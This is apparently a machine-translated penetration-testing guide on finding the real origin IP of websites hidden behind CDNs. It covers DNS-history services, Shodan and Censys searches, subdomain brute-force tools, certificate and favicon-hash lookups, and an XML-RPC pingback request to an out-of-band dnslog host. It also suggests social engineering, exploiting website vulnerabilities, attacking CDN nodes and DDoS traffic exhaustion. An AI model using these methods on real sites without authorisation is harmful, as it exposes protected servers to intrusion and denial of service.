CDN 2021 full attack Guide (1)
This is the most complete, detailed, up-to-date, and practical article on CDN network against attacks in the whole network (whether at home or abroad). If CDN problems occur in the penetration test, just read this guide. I will also go to Github (https://github.com/bin-maker/2021CDN/) keep the update of this article for a long time, update and revise New confrontation technologies, tools and websites.
Content Delivery Network, which is called Content distribution Network in Chinese, or CDN for short.
CDN technology can effectively improve the access speed and security of websites. Therefore, on the Internet, over 50% of Alexa's top 1,000 websites and over 35% of Alexa's top 10,000 websites are deployed behind CDN Networks, all users who request website content will obtain the cached version from the nearest CDN proxy server, so the content loading speed is faster and the website performance is improved.
The relevant principles of CDN are described on the internet. Interested readers can learn about it by themselves. This Guide aims at attacking, pursuing simplicity, efficiency and practicality, we will not repeat more conceptual things.
0x01 common CDN service providers
1. Domestic CDN service providers
●Alibaba Cloud CDN
●Baidu Cloud CDN
●Qiniu Cloud CDN
●And film clouds CDN
●Tencent Cloud CDN
●Ucloud
●360 CDN
●Netscape technology
●ChinaCache
●Dilian technology
2. CDN service providers abroad
●CloudFlare
●StackPath
●Fastly
●Akamai
●CloudFront
●Edgecast
●CDNetworks
●Google Cloud CDN
●CacheFly
●Keycdn
●Udomain
●CDN77
0x02 determine whether the website uses CDN
●Check the domain name IP address to see if a large number of irrelevant domain names exist.
●Check whether the header of the returned data in the request response has the CDN service provider ID.
●Use super ping to test the ping at different locations to check whether the returned IP addresses are different.
●Determine whether the IP address is in the IP address segment of a common CDN service provider
●If the server returned by the asp or asp.net website is not IIS but Nginx, nginx Reverse proxy is mostly used
●Use the Nslookup to query the domain name and check whether multiple response IP addresses are returned.
0x03 how to bypass the real IP address of CDN shuoyuan website
1. Query DNS records, IP history records, and subdomain names.
●Many websites only provide CDN for key domain names or primary domain names, and many subdomains do not use CDN services. Therefore, you can query the root domain name, secondary domain name, three-level domain names or even multi-level subdomains to obtain real IP addresses. However, sometimes the real IP address is not found, and only A record is made. In this case, you can continue to scan the IP addresses and ports of the same C segment, and then check whether the website is the target one by one.
●Before using the CDN service, the website resolves the real IP address, so you can query the DNS history to see if the IP address before using the CDN service can be detected.
●DNS records focus on TXT records and SPF records to see if real IP addresses are leaked.
1. Online query platform
1.SecurityTrails (https://securitytrails.com/)
SecurityTrails (formerly known as DNS Trails) has about 3.5 trillion DNS records, 0.3 billion whois records, 0.8 billion SSL certificate records and over 0.45 billion subdomains. Since 2008, the website has collected and updated a large amount of data every day.
SecurityTrails is one of my most commonly used platforms. It is free and accurate, and the data volume is extremely large enough to support daily use.
DNS records:
IP history:
Subdomain name:
2.Complete DNS (https://completedns.com/)
Complete DNS has more than 2.2 billion DNS change records and provides APIs to query multiple domain names and IP addresses at the same time.
3.WhoISrequest (https://whoisrequest.com/)
WhoISrequest, this website has been tracking and recording historical DNS changes since 2002, with sufficient data.
The UI style of this timeline design is not very impressive, like it.
4.Whoxy (https://www.whoxy.com/)
Whoxy crawls data from more than 0.365 billion subdomains. This website is very convenient to call APIs and returns data in XML and JSON formats.
5. Micro-step Threatbook (https://x.threatbook.cn/)
Threatbook allows you to query threat intelligence, history, subdomain resolution, DNS resolution, and other information based on IP addresses and domain names.
6.Netcraft (https://netcraft.com/)
Netcraft needless to say, many people know it, but different people have different opinions. After the changes of the times, Netcraft is not the former teenager. I just want to mention it here for reference only.
7.Viewdns (https://viewdns.info/)
Viewdns can be said to be very concise and intuitive. Even if you don't know any English, I believe you can understand it, at least you know where to input it, right. The response speed is also very fast, the home page is clear at a glance, and a large number of query functions are integrated.
It is good to find the function you need, and it is also OK to use the API provided by the website
8.Whoisxmlapi (https://reverse-ip.whoisxmlapi.com/)
Whoisxmlapi database contains more than 0.14 billion domain name ecological data, which is used to reverse IP and DNS data. It is very useful to perform reverse comparison when bypassing CDN. The website, like whoxy, returns data in XML and JSON format and supports customization.
9.Dnsdb (https://dnsdb.io/)
Dnsdb is a very powerful platform. It is also one of my common platforms.
Before searching, you can learn the search syntax:
Feel difficult? Don't want to learn? It doesn't matter. The webmaster has considered the situation of lazy people like you. There is a search constructor prepared for lazy people on the homepage, which is very friendly:
10.SubDomainTools (https://ruo.me/sub)
Online subdomain name query supports real-time mode and background mode, does not block front-end threads, does not occupy CPU, and is very convenient for small testing.
2. IOT internet of things network space mapping search engine
1.Censys (https://censys.io/)
Censys helps security practitioners discover devices that can be accessed from Internet, including IP addresses, open ports, physical locations, domain name information, hosting service providers, SSL certificates, and other data, find the required information and trace the real IP address of the website.
2.FOFA (https://fofa.so/)
FOFA can quickly match website assets and speed up subsequent work, such as vulnerability impact analysis, application distribution statistics, and application popularity ranking statistics. FOFA is very friendly. You can query enough data even if it is free of charge. As long as you are not a commercial or demanding user, you do not need to open a membership.
3.Shodan (https://www.shodan.io/)
Shodan is called the most powerful search engine on the internet. It is mainly used to search for online devices in cyberspace. You can use Shodan to search for specified devices or specific types of devices, it can help security researchers find useful information about their research goals.
The syntax is very powerful. We recommend that you browse the filter document before searching to get twice the result with half the effort.
4.Zoomeye
Zoomeye, Zhong Yizhi knows that Shodan focuses on host devices, while Zoomeye focuses on Web discovery.
3. Tools and scripts
1.SubDomainsBrute
Project address:https://github.com/lijiejie/subDomainsBrute
SubDomainsBrute is to search for subdomains through pure DNS blasting. To maximize script efficiency, coroutine + multi-process blasting is adopted. For Python 3.5 and later, you need to install the aiodns library for asynchronous query, and for python 2, you need to install the dnspython Library and the gevent coroutine Library.
Previously, you cannot scan for wildcard DNS for domain names. In October, the author update already supports wildcard DNS. Use the-w parameter.
As shown in the following figure, a wildcard DNS domain name is cracked. subDomainsBrute, an any-sub error is displayed. Then, The-w parameter is used to enable wildcard DNS forced cracking:
2.ESD
Project address:https://github.com/FeeiCN/ESD
Compared with violent collection methods, ESD has unique ideas in many aspects.
●Enumerates wildcard DNS domains based on the RSC (response similarity comparison) technology.
●Obtain the response content of a subdomain name that does not exist based on the aioHTTP, and compare it with the dictionary subdomain name response similarity. If the value exceeds the threshold, it indicates that the subdomain name is the same page. Otherwise, the subdomain name is available, and compare the response similarity of the final subdomain name again.
●Enumerates domain names based on AsyncIO asynchronous protocol technology.
●AsyncIO + aioDNS is 50% faster than the traditional multi-process/multi-thread/gevent mode.
●Resolve the problem that DNS service providers do not determine the egress of network lines.
●The cache time of each DNS service provider is inconsistent.
●Resolve random DNS issues.
●Invalid DNS addresses are automatically removed based on network conditions to improve the enumeration success rate.
ESD filters wildcard parsing by using text similarity and threshold judgment. This method seems to be very cumbersome now. We can modify the script ourselves. Otherwise, the memory and CPU of the machine will be overloaded, it requires high machine performance and does not support python2.
Install Python 3 directly through pip:
$pip install esd
Basic usage (provided by the project official):
# Scan a single domain name esd -d qq.com # Scan a single domain name in debug mode esd=debug esd -d qq.com # Scan multiple domain names with commas (,) esd --domain qq.com,tencent.com # Scan a single domain name and filter out a specific response content in a subdomain name esd -- domain mogujie.com -- filter search our store # Scan a single domain name and filter multiple specific response content in a subdomain name esd -- domain mogujie.com -- filter search our store, favorite store # Scan the file (one domain name per line in the file) esd --file targets.txt # Skip similarity comparison (if this option is enabled, all wildcard DNS domains are filtered out) esd --domain qq.com --skip-rsc # Use the search engine to search for subdomains (baidu, google, bing, and yahoo are supported, separated by commas (,) esd --domain qq.com --engines baidu,google,bing,yahoo # Split the dictionary averagely to speed up the blasting. esd --domain qq.com --split 1/4 # Use DNS domain transfer vulnerabilities to obtain subdomains esd --domain qq.com --dns-transfer # Use HTTPS certificate transparency to obtain subdomains esd --domain qq.com --ca-info
But in fact, starting from the source code, we find that many functions have not been realized by the author:
parser = OptionParser('Usage: python ESD.py -d feei.cn -F response_filter -e baidu,google,bing,yahoo -p user:pass@host:port') parser.add_option('-d', '--domain', dest='domains', help='The domains that you want to enumerate') parser.add_option('-f', '--file', dest='input', help='Import domains from this file') parser.add_option('-F', '--filter', dest='filter', help='Response filter') parser.add_option('-s', '--skip-rsc', dest='skiprsc', help='Skip response similary compare', action='store_true', default=False) parser.add_option('-S', '--split', dest='split', help='Split the dict into several parts', default='1/1') parser.add_option('-p', '--proxy', dest='proxy', help='Use socks5 proxy to access Google and Yahoo') parser.add_option('-m', '--multi-resolve', dest='multiresolve', help='Use TXT, AAAA, MX, SOA record to find subdomains', action='store_true', default=False) parser.add_option('--skey', '--shodan-key', dest='shodankey', help='Define the api of shodan') parser.add_option('--fkey', '--fofa-key', dest='fofakey', help='Define the key of fofa') parser.add_option('--femail', '--fofa-email', dest='fofaemail', help='The email of your fofa account') parser.add_option('--zusername', '--zoomeye-username', dest='zoomeyeusername', help='The username of your zoomeye account') parser.add_option('--zpassword', '--zoomeye-password', dest='zoomeyepassword', help='The password of your zoomeye account') parser.add_option('--cuid', '--censys-uid', dest='censysuid', help="The uid of your censys account") parser.add_option('--csecret', '--censys-secret', dest='censyssecret', help='The secret of your censys account') (options, args) = parser.parse_args()
Not difficult to findHTTPS Certificate Transparency,Domain transfer vulnerabilityAnd other functions are not implemented.
ESD currently only supports Linux, which is determined by its source code. However, we can DIY it to support windows
As you can see, in the engine.py engine script, the directory is dead/tmp/esd, if you want to use it on windows, you only need to replace it with the output directory of windows.
# write output tmp_dir = 'C:\\temp \\' if not OS .path.isdir(tmp_dir): OS .mkdir(tmp_dir, 0o777) output_path_with_time = '{td}/.{domain}_{time}.esd'.format(td=tmp_dir, domain=self.domain, time=datetime.datetime.now().strftime("%Y-%m_%d_%H-%M")) output_path = '{td}/.{domain}.esd'.format(td=tmp_dir, domain=self.domain) if len(self.data): max_domain_len = max(map(len, self.data)) +2 else: max_domain_len = 2 output_format = '%-{0}s%-s\n'.format(max_domain_len) with open(output_path_with_time, 'w') as opt, open(output_path, 'w') as op: for domain, ips in self.data.items(): # The format is consistent with other scanners to ensure that they are # invoked at the same time without increasing the cost # resolution if ips is None or len(ips) == 0: ips_split ='' else: ips_split = ','.join(ips) con = output_format % (domain, ips_split) op.write(con) opt.write(con)
3.Layer subdomain excavator
Project address:https://hub.fastgit.org/euphrat1ca/LayerDomainFinder/releases/tag/3
Master Seay's work has been available for a long time. It is a very powerful GUI graphical tool on windows. It has undergone several iterations. The Official latest version is 5.0, of course, there are countless netizens' custom modified versions spreading in the wild.
4.Xray
Project address:https://github.com/chaitin/xray
xray is a powerful security assessment tool and an automated scanner. We can use its own subdomain sub-domain name discovery function for targeted detection:
The subdomain feature supports brute-force cracking and non-brute-force cracking. You can only detect web services or only subdomains that can be resolved by ip addresses. In addition, it supports webhook data transmission, it is very convenient and convenient to use as a plug-in or a receiving end for distributing messages.
5.Bypass-firewalls-by-DNS-history
Project address:https://github.com/vincentcox/bypass-firewalls-by-DNS-history
Bypass-firewalls-by-DNS-history is A fully automated detection tool that detects DNS history, searches for old DNS A Record, collects subdomains, and checks whether the server responds to the domain name. In addition, it is judged based on the similarity threshold of the source server and firewall in HTML responses.
Usage:
bash bypass-firewalls-by-DNS-history.sh -d example.com -d --domain: domain to bypass -o --outputfile: output file with IP's -l --listsubdomains: list with subdomains for extra coverage -a --checkall: Check all subdomains for a WAF bypass
In addition, similarsubfinder,dnsprobeAnd other tools, interested readers can study and understand its working principle and mechanism by themselves.
2. Post Office via Email
Generally, if the mail server deployed on large websites sends emails to external users without any data processing and protection measures, the source code of the email header contains the real IP address of the email server. Common email trigger points:
●RSS subscription
●Email registration and activation
●Password for email retrieval
●Product Update email push
●Email notification sent after a service is executed
●Forgot password at the entrance of employee mailbox, mail management platform, etc.
In addition, there is anotherStrange sexual skills, by sending an email to a non-existent email address, such000xxx@domain.com, because the user does not exist, sending will fail and will also receive a real IP notification containing the email sent to your server.
Pay more attention to these points in production. If one fails, continue to test the next email trigger point. Many large websites have more than one email server, not all of which are protected. Details determine success or failure.
3. SSL certificate
●Certificate Authorities (CA) must publish each SSL/TLS certificate they issue to public logs. SSL/TLS certificates usually contain domain names, subdomains, and email addresses. Therefore, the SSL/TLS certificate can be used to discover the real IP address of the target site.
●When the CDN service provider provides protection for the server, it also performs encrypted communication (ssl) with the server. In this case, when port 443 of the server accesses the domain name, it also exposes its certificate on port 443, we can find the real IP address of the website through certificate comparison.
1. Use the Censys engine (https://censys.io/)
●The Censys search engine can scan the entire Internet and scan IPv4 address space every day to search for all networked devices and collect relevant information. Censys can be used to search for SSL certificates across the Internet, find the real IP address.
As you can see, when we search for an Internet IP address, there is a certificate sha1 signature matching
Similarly, we search for the SSL certificate fingerprint based on the domain name fingerprint, and then check the IP address.
First, selectCertificatesCertificate Search, the results a bunchEffectiveCertificate andInvalidCertificate:
During the test, it is easy to fall into the misunderstanding of thinking, thinkingEffectiveThe certificate is what we need, but it is not necessarily, many server configuration errors are still retainedInvalidFor example, in the example, when there are many results, I use Censys syntax to search for accurate positioning.EffectiveSSL certificate, reduced result:
parsed.names: xxx.com and tags.raw: trusted
The number of results is reduced to two in an instant. Click one by one, and then the sha1 signature is used to check the IPV4 host:
But unfortunately, neither of the two records was found:
This also shows from the side that not all websites only haveEffectiveThe certificate matches its IP server.
Therefore, you can only go back to the beginning, open all the results in turn and check the fingerprints, and finally locate the real IP address:
Safety is not only a technical job, but also a careful job.
2. Use the command line
●PassopensslAndCurlAnd other common basic commands can also achieve the effect of anti-check SSL certificates.
openssl:
openssl s_client -connect 123.123.123.123:443 | grep subject
curl:
curl -v https://123.123.123.123 | grep 'subject'
3. Use tools and scripts
●By writing your own script and integrating the preceding two points 1 and 2, you can completely implement a simple version of SSL certificate crawling. You can also use some existing script tools and websites, it saves us effort.
For exampleCloudFlair, Project address:https://github.com/christophetd/CloudFlair
The script is compatible with python2.7 and 3.5. You need to configure the Censys API. However, you can only check whether the target website uses the CloudFlare service.
Register an account in Censys and enterhttps://censys.io/account/apiObtain the API ID and Secret:
Clone the CloudFlair locally and import the API ID and Secret to the environment variables:
$git clone https://github.com/christophetd/CloudFlair $export CENSYS_API_ID="xxx" $export CENSYS_API_SECRET="xxx"
Use requirements.txt to install dependencies:
$pip install -r requirements.txt
Run cloudflair.py:
$python cloudflair.py --censys-api-id xxx --censys-api-secret xxx baidu.com [*] The target appears to be behind CloudFlare. [*] Looking for certificates matching "myvulnerable.site" using Censys [*] 75 certificates matching "myvulnerable.site" found. [*] Looking for IPv4 hosts presenting these certificates... [*] 10 IPv4 hosts presenting a certificate issued to "myvulnerable.site" were found. -51.194.77.1 -223.172.21.75 -18.136.111.24 -127.200.220.231 -177.67.208.72 -137.67.239.174 -182.102.141.194 -8.154.231.164 -37.184.84.44 -78.25.205.83 [*] Retrieving target homepage at https://myvulnerable.site [*] Testing candidate origin servers -51.194.77.1 -223.172.21.75 -18.136.111.24 responded with an unexpected HTTP status code 404 -127.200.220.231 timed out after 3 seconds -177.67.208.72 -137.67.239.174 -182.102.141.194 -8.154.231.164 -37.184.84.44 -78.25.205.83 [*] Found 2 likely origin servers of myvulnerable.site! -177.67.208.72 (HTML content identical to myvulnerable.site) -182.102.141.194 (HTML content identical to myvulnerable.site)
In fact, you can use the API provided by Censys to integrate a simple and practical fully automated detection script. If I have time to write it later, it will be updated here synchronously.
4. Certificate collection
Yeshttps://crt.shPerform fast certificate query and collection
The python script for the query is attached:
import requests import re TIME_OUT = 60 def get_SSL(domain): domains = [] url = 'https://crt.sh /? q=%25.{}'.format(domain) response = requests.get(url,timeout=TIME_OUT) ssl = re.findall("<TD>(.*?) .{}</TD>".format(domain),response.text) for I in ssl: I += '.' + domain domains.append( I) print(domains) if __name__ == '__main __': get_SSL("baidu.com")
Obtain all subdomains that contain certificates:
4. Query through overseas DNS
●For users in the domestic market, most CDN service providers do not use CDN in overseas markets. Therefore, you can search for niche and unpopular overseas DNS queries to see if you can obtain real IP addresses.
$nslookup target.com <overseas DNS address>
You can also use the overseas super ping platform to test online in multiple countries and regions. Recommendedhttps://www.host-tracker.com/v3/check/, supports ping tests in more than 140 regions, and supports ultra-long term monitoring for a sub-domain. It is extremely powerful by email notification.
5. Leakage through sensitive files
Including but not limited:
●Server log files
●Probe file, such as phpinfo
●Website backup compressed files
●. DS_Store
●.hg
●.git
●SVN
●Web.xml
The dictionary is very important. It is often neglected in an edge server.
VI. Domain name changed
●Many websites change their domain names during the development process. For example, the previous domain name of Jingdong was 360buy.com, and later it spent a huge sum of money on jd.com.
●When a website changes its new domain name, if the CDN is deployed to the new domain name, and the previous domain name has not expired, the CDN may not be used, so you can directly obtain the server IP address, so, historical domain names are also important.
7. Mobile applications via APP
●If web presence APP, can pass caught analysis its APP data flow, see if you can find website real IP address, remember attention APP version of history, there will be full of surprise.
8. Use F5 LTM to decode
●LTM distributes all application requests to multiple node servers. Server load balancer improves the processing capability of your business.
●When the server uses F5 LTM for load balancingset-cookieYou can obtain the real ip address of the server by decoding the keyword.
Example:
Set-Cookie: BIGipServerpool_9.29_5229=605532106.22012.0000
●First, take out the decimal number in the first section, that is, 605532106.
●Convert it to a hexadecimal number of 2417afca
●Then take four bytes from the back to the front: CA AF 17 24
●Finally, it is converted to the decimal number 202.175.23.36, which is the real ip address of the server.
9. Use the CDN header feature value
After CDN is enabled for many websites, you are configured to deny direct access to real IP addresses. For example, the CloudFlare prompts:
Therefore, you can narrow down the range by matching the feature header. In this example, you can use Censys to query:
Syntax: <port>http.get.headers.server:<CDN features> eg: 80.http.get.headers.server:cloudflare
The search results for the entire Internet are further matched, for example, through the port, geographic location, banner characteristics, anti-check email, contact information, and other information, continue to accurate results:
10. Communication through XML-RPC PINGBACK
●XML-RPC is a standard that supports communication between WordPress and other systems. It standardizes these communication processes by using HTTP as a transmission mechanism and XML as a coding mechanism.
●In earlier versions of WordPress, XML-RPC was disabled by default, but started from version 3.5, which is enabled by default.
●XML-RPC support trackback and pingback.
●Although WordPress have used REST API to replace XML-RPC, XML-RPX will not be outdated. It is good to use it with confidence and boldness. Although XML-RPC technology is very old, it can still kill many websites.
After dnslog is configured, the POST request XML-RPC:
POST /xmlrpc.php HTTP/1.1 Host: domain.com Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en,zh-CN;q=0.9,zh;q=0.8 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 323 <? xml version="1.0" encoding="UTF-8"?> <methodCall> <methodName>pingback.ping</methodName> <params> <param> <value><string>http://2vbis4.dnslog.cn</string></value> </param> <param> <value><string>https://domain.com/</string></value> </param> </params> </methodCall>
Response:
Refresh dnslog to obtain the real server IP address:
11. Use FTP/SCP protocol
●In many cases, websites need to transmit data streams from outside to internal servers, the safest way is to establish a virtual private network (V * P + N anti-Harmony) between users and servers.
●However, in fact, there are still a large number of FTP / SCP services that can be accessed from the outside, making it easy to find the source IP address.
XII. Use Websocket agreement
●CDN service providers such as CloudFlare have already supported the protection of Websocket, but many webmasters, regardless of big or small websites, do not know or deploy Websocket.
●Another reason is due to business requirements. After all, Websocket requires a persistent connection between the client and the server, it is likely that CDN is not deployed.
13. Through social engineering
●Kellen King, an outstanding early thinker, philosopher, sociologist and economist in the early 21st century, was the originator of social engineering. He called himself a bracket.
●Maybe someone laughed, but don't underestimate the power of social workers. How many big factories and operators are under the feet of social engineering, such as Mail fishing, pit attack, physical social workers, identity disguise, customer service fraud, business consulting, and so on. There are numerous cases.
●Because people are not machines, as long as they are people, there must be vulnerabilities.
●Oh yes, by the way, I recommend a movie called "cat and mouse game" by Little Li Zi.
14. Website vulnerabilities
●If the target website has vulnerabilities, such as SSRF, XXE, XSS, file upload, and command execution, or other breakthroughs we have found, inject our own out-of-band server address, then, check the HTTP logs on the server.
●The error of the application itself causes an internal exception when some incorrect parameter values or incorrect addresses are passed, that is, the common error is reported. Pay attention to the error points, some real IP addresses or internal CIDR blocks are often disclosed.
15. Scan through the whole network
●What age is it? Why are you still talking about scanning the whole network. In order to write the whole method, I 'd like to mention it here.
●Obtain the ip address segment of the target region from the apnic Network Information Center or IPdeny.
●Then, use tools such as Zmap and masscan to crawl the banner of the hosts whose ports are open.
●Then, in the Host field of http-req, write the subdomain that we need to find.
●Finally, filter the features to check whether there is a corresponding server response.
●Oh, by the way, if the port is not common or fixed, retire on the spot.
●In fact, the whole network scanning method is very cumbersome and is not recommended. Because many websites have provided us with web-wide crawling services, the previous methods have introduced, why do we scan our own web-wide, limited by network, limited by equipment, can your personal data be fully crawled by others?
16. Collision through virtual-host
●When we collect enough potential real IP addresses of the target, we can obtain multiple subdomains that hit the target and which target subdomains through the collision of IP addresses and subdomains.
The IP address is correct and the subdomain is incorrect:
Correct IP address and correct subdomain:
The IP address is invalid. The subdomain is correct:
You can use the virtual-host-discovery tool to automate the process. The project address is as follows:https://github.com/jobertabma/virtual-host-discovery
Clone to local
$git clone https://github.com/jobertabma/virtual-host-discovery
Usage:
$ruby scan.rb --ip=x.x.x.x --host=domain --wordlist=<dict file>
The wordlsit parameter can be omitted. By default, a dictionary is loaded. This parameter specifies the list of subdomains that we want to run.
After the execution, you can quickly find the subdomains that hit the IP address.
In addition, you can use the find-virtual-hosts (https://pentest-tools.com/information-gathering/find-virtual-hosts#) tools to quickly scan and compare data online to obtain the following results:
17. Hash features through favicon.ico
●favicon.ico is a small icon displayed on the left side of the webpage title in modern browsers.
●The icon data is usually fromhttps://anywebsite/favicon.icoThe browser will automatically request it when browsing any website.
●This is because the fingerprint hash of favicon.ico can be calculated, and the same host results can be searched by search engines such as shodan to further detect whether the real IP address of the target website can be dug out.
Small script for calculating favicon.ico hash:
python 2
import mmh3 import requests response = requests.get('https://domain.com/favicon.ico') favicon = response.content.encode('base64') hash = mmh3.hash(favicon) print hash
python 3
import mmh3 import requests import codecs response = requests.get('https://domain.com/favicon.ico') favicon = codecs.encode(response.content,"base64") hash = mmh3.hash(favicon) print(hash)
After the environment dependency is installed, run the script to calculate the favicon.ico hash value of the target website:
$apt-get install build-essential $apt-get install gcc $apt-get install g++ $python 3.py
Then use the shodan search engine to search for the hash to hit the IP address:
$proxychains shodan search http.favicon.hash:1730752770 --fields ip_str,port --separator "" | awk '{print $1 ":
It is also worth mentioning that during the penetration process, fingerprints can be sorted and sorted according to favicon hash, subdomain, and IP hits. In addition, a common middleware or component fingerprint hash table can be made, quickly hit assets by category:
Eighteen, through the webpage source code characteristic value
●If the source IP address of the server allows access and returns similar website content, you can detect a series of static features such as JS, CSS, and HTML in the source code of the page, and then use Shodan, Zoomeye, search engines such as Censys perform matching searches to locate IP addresses.
For example, a Google Analytics JS feature is found in the source code:
Then shodan searches for these code features:
http.html:UA-XXXXX-X http.html:GTM-XXXXXX
Find the server source IP address:
19. Remote resource services through websites
●Find more business sites on the target website that support passive connections such as remote images and files, inject resource files from our own servers, and then view HTTP logs to locate the connections to the target server.
●For example, load a remote avatar.
20. Through the CDN machine
●Some websites use self-built CDN machines for load balancing. It is difficult to ensure that each CDN machine is 100% secure. If there is no way, you can try to test the penetration of these CDN machines. If you can win one, you will have everything, the safety of the target master station does not mean that there are no defects in all production routes. The Safety lies not in how strong the real strong place is, but in how weak the weak place is.
21. Attacks through traffic exhaustion and traffic amplification
●CDN is charged, so its traffic must be limited. When testing some websites that are not super-large target websites, note that, with the permission of the project Party, you can test the ddos traffic.
●When CDN traffic is exhausted, no content is distributed. You can directly obtain the source IP address.
●However, CDN is a traffic penetration. Before the traffic is exhausted, the target website is gg.
●Another old practice is to set the IP address of the origin site to be protected as the address of the CDN node through its own defects in CDN settings. As a result, CDN traffic enters a dead loop. After being amplified layer by layer, at last, he killed himself. However, most CDN vendors have already restricted setting CDN nodes as CDN node IP addresses and enabled the Automatic Packet loss protection mechanism.
22. Through the domain name ICP filing information wide area detection
●For the target domain name and the target second-level domain name, if CDN is enabled, will the thinking be interrupted?
●Definitely not. Here is a unique secret skill that few people pay attention.
●Websites need servers. However, it is impossible for a local company to have one server for one domain name. In most cases, multiple domain name businesses share one server.
●If the target website has an ICP filing, you can query the ICP filing information, collect other website domain names and other subdomains filed by the enterprise or individual, and then perform a round of wide-area detection, it is very likely that the IP address of the real server is directly exposed in one of the edge subdomains without CDN, and then further verify whether the IP address is also the real IP address of the target website.
●In particular, the success rate of this method is extremely high, and the speed of finding it is very fast. Therefore, students who have the willpower to read it can see it.
23. Use the default configuration of CDN service providers
●Different CDN service providers have different product configurations by default.
●For example, CloudFlare, the direct.domain.com subdomain is configured to point to the source IP address of the server by default. However, many companies or individuals do not modify the default configuration when using CDN protection, resulting in the risk of IP leakage.
●Other high-risk sub-domains, such as ftp, mail, cpanel, and direct-connect, can also be focused on to facilitate fast Positioning. After all, time is money in public beta.
24. Fingerprint through SSH
●Off the question, SSH fingerprint is generally used for anonymous Tor network tracking
25. Use CloudFair tools
●If your goal is CloudFlare protection, it is recommended to use this tool first.
●CloudFail is a tactical reconnaissance tool designed to collect sufficient information about Cloudflare-protected targets in order to discover the IP address location of the server.
The tool detects three different attack stages:
1. Use DNSDumpster.com to scan for DNS configuration errors.
2. Scan and compare the Crimeflare.com database.
3. The built-in dictionary scans more than 11000 subdomains.
Installation and Use:
$git clone https://github.com/m0rtem/CloudFail $pip install -r requirements.txt $python cloudfail.py -t domain.com _____________ /\_| | \_\| | \___ _(_) | | | |/ _ \| | | |/ _'| |_ / _' | | | | | | | |_| | (_) | | |_| | (_| |_| (_| | | | | | \____|_|\___/ \__,_|\__,_|_| \__,_|_|_| v1.0.2 by m0rtem [16:12:31] Initializing CloudFail - the date is: 07/01/2021 [16:12:31] Fetching initial information from: domain.com... [16:12:31] Server IP: 104.xx.x.76 [16:12:31] Testing if domain.com is on the Cloudflare network... [16:12:31] domain.com is part of the Cloudflare network! [16:12:31] Testing for misconfigured DNS using dnsdumpster... [16:12:35] [FOUND:HOST] domain.com HTTP: cloudflare TCP8080: cloudflare 172.xx.xx.62 CLOUDFLARENETUnited States United States [16:12:35] [FOUND:HOST] freelance.domain.com HTTP: cloudflare TCP8080: cloudflare 104.xx.xx.76 CLOUDFLARENETUnited States United States [16:12:35] [FOUND:HOST] www.freelance.domain.com HTTP: cloudflare TCP8080: cloudflare 104.xx.xx.76 CLOUDFLARENETUnited States United States [16:12:35] [FOUND:HOST] ctf.domain.com HTTP: nginx/1.10.3 HTTPS: nginx/1.10.3 SSH: SSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u7 185.231.245.55 TEAM-HOST AS Russia [16:12:35] [FOUND:HOST] www.ctf.domain.com HTTP: nginx/1.10.3 HTTPS: nginx/1.10.3 SSH: SSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u7 185.231.245.55 TEAM-HOST AS Russia [16:12:35] [FOUND:HOST] mail.domain.com 62.213.11.246 ROSTELECOM-ASRussia Russia [16:12:35] [FOUND:HOST] school.domain.com HTTP: cloudflare TCP8080: cloudflare 104.xx.xx.76 CLOUDFLARENETUnited States United States [16:12:35] [FOUND:HOST] www.school.domain.com HTTP: cloudflare TCP8080: cloudflare 104.xx.xx.76 CLOUDFLARENETUnited States United States [16:12:35] [FOUND:HOST] pentest.domain.com HTTP: cloudflare TCP8080: cloudflare 104.xx.xx.76 CLOUDFLARENETUnited States United States [16:12:35] [FOUND:HOST] www.pentest.domain.com HTTP: cloudflare TCP8080: cloudflare 104.xx.xx.76 CLOUDFLARENETUnited States United States [16:12:35] [FOUND:HOST] w.domain.com HTTP: nginx/1.6.2 HTTPS: nginx/1.6.2 SSH: SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u8 185.xx.xx.136 TEAM-HOST AS Russia [16:12:35] [FOUND:HOST] www.w.domain.com HTTP: nginx/1.6.2 HTTPS: nginx/1.6.2 SSH: SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u8 185.xx.xx.136 TEAM-HOST AS Russia [16:12:35] [FOUND:HOST] www.domain.com HTTP: cloudflare TCP8080: cloudflare 104.xx.xx.76 CLOUDFLARENETUnited States United States [16:12:35] [FOUND:HOST] pay.domain.com HTTP: cloudflare TCP8080: cloudflare 104.xx.xx.76 CLOUDFLARENETUnited States United States [16:12:35] [FOUND:HOST] www.pay.domain.com HTTP: cloudflare TCP8080: cloudflare 104.xx.xx.76 CLOUDFLARENETUnited States United States [16:12:35] [FOUND:DNS] tim.ns.cloudflare.com. 173.xx.xx.145 CLOUDFLARENETUnited States United States [16:12:35] [FOUND:DNS] tina.ns.cloudflare.com. 173.xx.xx.230 CLOUDFLARENETUnited States United States [16:12:35] [FOUND:MX] 62.xx.xx.246 ROSTELECOM-ASRussia 10 mail.domain.com. [16:12:35] [FOUND:MX] 62.xx.xx.246 ROSTELECOM-ASRussia 20 mail.domain.com. [16:12:35] Scanning crimeflare database... [16:12:36] [FOUND:IP] 62.xx.xx.230 [16:12:36] [FOUND:IP] 62.xx.xx.246 [16:12:36] Scanning 11219 subdomains (subdomains.txt), please wait... [16:15:52] [FOUND:SUBDOMAIN] mail.domain.com IP: 62.xx.xx.246 HTTP: 200 [16:16:13] [FOUND:SUBDOMAIN] pay.domain.com ON CLOUDFLARE NETWORK! [16:16:35] [FOUND:SUBDOMAIN] school.domain.com ON CLOUDFLARE NETWORK! [16:17:03] [FOUND:SUBDOMAIN] w.domain.com IP: 185.xx.xx.136 HTTP: 200 [16:17:10] [FOUND:SUBDOMAIN] www.domain.com ON CLOUDFLARE NETWORK! [16:17:14] Scanning finished...
Close your eyes and rest for a while, then run out:
If you like to be lazy, you can use the online query:https://suip.biz/? act=cloudfailThis tool has been integrated into the background, and a front-end UI page has been made for security information practitioners to query online:
The script execution result can be directly seen at the front end, and PDF report download is provided. Here I use baidu.com for testing, because baidu.com does not use CloudFlare CDN, so the speed is very fast.
If you query domain names that use CloudFlare CDN, the speed will be slow, the page will be empty, and nothing will be displayed:
